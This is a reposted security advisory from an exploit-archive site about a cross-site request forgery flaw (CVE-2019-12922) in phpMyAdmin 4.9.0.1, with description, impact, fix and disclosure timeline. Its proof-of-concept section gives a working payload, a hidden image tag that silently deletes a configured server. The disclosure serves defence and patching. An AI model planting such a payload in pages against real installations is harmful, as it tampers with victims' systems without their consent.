Registerphpmyadmin 4.9.0.1 crosssite request forgery
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
Online Vulnerability Scanner Tools
Code...
============================================= MGC ALERT 2019-003 - Original release date: June 13, 2019 - Last revised: September 13, 2019 - Discovered by: Manuel Garcia Cardenas - Severity: 4,3/10 (CVSS Base Score) - CVE-ID: CVE-2019-12922 ============================================= I. VULNERABILITY ------------------------- phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery II. BACKGROUND ------------------------- phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL and MariaDB. III. DESCRIPTION ------------------------- Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any server in the Setup page. IV. PROOF OF CONCEPT ------------------------- Exploit CSRF - Deleting main server <p>Deleting Server 1</p> <img src=" http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1" style="display:none;" /> V. BUSINESS IMPACT ------------------------- The attacker can easily create a fake hyperlink containing the request that wants to execute on behalf the user,in this way making possible a CSRF attack due to the wrong use of HTTP method. VI. SYSTEMS AFFECTED ------------------------- phpMyAdmin <= 4.9.0.1 VII. SOLUTION ------------------------- Implement in each call the validation of the token variable, as already done in other phpMyAdmin requests. VIII. REFERENCES ------------------------- https://www.phpmyadmin.net/ IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY ------------------------- June 13, 2019 1: Initial release September 13, 2019 2: Last revision XI. DISCLOSURE TIMELINE ------------------------- June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas June 13, 2019 2: Send to vendor July 16, 2019 3: New request to vendor without fix date September 13, 2019 4: Sent to lists XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Manuel Garcia Cardenas Pentester
Phpmyadmin 4.9.0.1 crosssite request forgery Vulnerability / Exploit Source : Phpmyadmin 4.9.0.1 crosssite request forgery
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes